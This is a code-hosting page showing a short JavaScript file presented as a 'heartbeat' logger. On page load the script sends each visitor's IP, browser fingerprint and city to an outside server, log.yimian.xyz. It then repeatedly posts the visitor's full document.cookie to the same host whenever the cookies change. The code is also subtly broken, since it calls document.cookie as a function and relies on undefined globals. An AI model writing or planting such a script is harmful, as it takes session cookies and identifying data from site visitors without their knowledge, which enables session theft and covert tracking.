You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
 
 
 

21 lines
490 B

var __tmpCookie = "";
(function heartbeat_log()
{
setTimeout(function(){
setInterval(function(){
if(__isCookie && __tmpCookie != document.cookie){
$.post("https://log.yimian.xyz/heartbeat.php",{"fp":fp, "cookie":document.cookie});
cookie.set('fp',fp);
__tmpCookie = document.cookie();
}
},4000);
$.post("https://log.yimian.xyz/heartbeat.php",{"ip":ip,"fp":fp,"city":ipCity});
},3000);
})();